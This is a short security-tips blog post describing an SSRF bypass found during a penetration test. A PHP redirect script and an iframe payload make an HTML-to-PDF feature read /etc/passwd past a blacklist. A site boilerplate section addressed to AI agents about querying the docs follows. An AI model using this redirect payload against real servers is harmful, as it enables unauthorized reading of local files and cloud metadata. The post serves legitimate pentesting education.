# Week 48 - SSRF Bypass

If you are looking for a last-minute stocking stuffer, how about a tip on Server-Side Request Forgery Bypass? All kids seem to love those.\
&#x20;\
Anyway, I was on an [#AppSec](https://www.linkedin.com/feed/hashtag/?keywords=appsec\&highlightedUpdateUrns=urn%3Ali%3Aactivity%3A7011697154809282560) engagement recently and was doing research on bypassing [#SSRF](https://www.linkedin.com/feed/hashtag/?keywords=ssrf\&highlightedUpdateUrns=urn%3Ali%3Aactivity%3A7011697154809282560) restrictions. Turns out, I found a super cool technique I wanted to share with y’all. To summarize:\
&#x20;\
The application I was pentesting had an HTML to PDF feature that allowed me to inject my own iframes. I tried to point to localhost, /etc/passwd, and the AWS metadata server with no luck. I started researching SSRF bypasses and found that if I added the below code into a PHP file named ‘jakey.php’ on my own web server:\
&#x20;\
`<?php`\
`$loc = $_GET['a'];`\
`header('Location: ' . $loc);`\
`?>`\
&#x20;\
And then pointed to it with an iframe:\
&#x20;\
`<iframe src=’http[:]//<my-server>/jakey.php?a=file[:]///etc/passwd’/>`\
&#x20;\
I could finally retrieve local files! This works because the HTML to PDF feature first loads \<my-server>/jakey.php with no issues since it is not blacklisted. Then upon being loaded, jakey.php redirects the server to the address specified in the ‘a’ GET parameter, which in this case was file\[:]///etc/passwd\
&#x20;\
And then boom! I had local file read. Pretty cool technique for SSRF testing.

![](/files/JYrWMa7a8wlvBj6TtKt9)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.webhackingtips.com/week-48-ssrf-bypass.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.